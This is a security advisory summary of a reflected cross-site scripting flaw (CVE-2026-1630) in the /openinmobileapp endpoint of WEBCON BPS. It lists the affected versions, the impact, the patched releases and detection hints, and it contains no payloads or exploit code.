Full Report
Cross-site Scripting vulnerability (CVE-2026-1630) has been found in WEBCON BPS software.
Analysis Summary
# Vulnerability: Reflected Cross-Site Scripting (XSS) in WEBCON BPS
## CVE Details
- **CVE ID:** CVE-2026-1630
- **CVSS Score:** Not explicitly provided in source (Typical Reflected XSS scores range from 5.4 to 6.1 Medium)
- **CWE:** CWE-79 (Improper Neutralization of Input During Web Page Generation)
## Affected Systems
- **Products:** WEBCON BPS (Business Process Suite)
- **Versions:**
- 2026.1.1.45 through versions prior to 2026.1.3.109
- 2025.1.1.87 through versions prior to 2025.2.1.293
- **Configurations:** Systems utilizing the `/openinmobileapp` endpoint.
## Vulnerability Description
WEBCON BPS is susceptible to a Reflected Cross-Site Scripting (XSS) vulnerability. The flaw exists due to insufficient sanitization of input parameters within the `/openinmobileapp` endpoint. A remote attacker can engineer a malicious URL containing a payload that, when executed by a victim's browser in the context of an authenticated session, allows for the execution of arbitrary JavaScript.
## Exploitation
- **Status:** Not reported as exploited in the wild; coordinated disclosure.
- **Complexity:** Low
- **Attack Vector:** Network (Remote)
## Impact
- **Confidentiality:** High (Potential for session token theft and access to user data)
- **Integrity:** High (Ability to perform actions on behalf of the user or modify page content)
- **Availability:** None/Low
## Remediation
### Patches
The vendor has released security updates to address this flaw. Administrators should update to the following versions or higher:
- **WEBCON BPS 2026.1.3.109**
- **WEBCON BPS 2025.2.1.293**
### Workarounds
No specific workarounds were provided. The primary remediation is the application of the official patches. General XSS mitigations such as implementing a strong Content Security Policy (CSP) and ensuring WAF rules are active for the `/openinmobileapp` endpoint may provide defense-in-depth.
## Detection
- **Indicators of Compromise:** Unusual or encoded JavaScript payloads appearing in web server access logs associated with the GET/POST parameters of the `/openinmobileapp` endpoint.
- **Detection Methods:** Vulnerability scanners and web application security testing tools can verify the presence of the flaw by injecting non-malicious scripts into the affected parameters.
## References
- CERT Polska Advisory: hxxps[://]cert[.]pl/en/posts/2026/05/CVE-2026-1630/
- CVE Record: hxxps[://]www[.]cve[.]org/CVERecord?id=CVE-2026-1630
- CWE-79 Definition: hxxps[://]cwe[.]mitre[.]org/data/definitions/79[.]html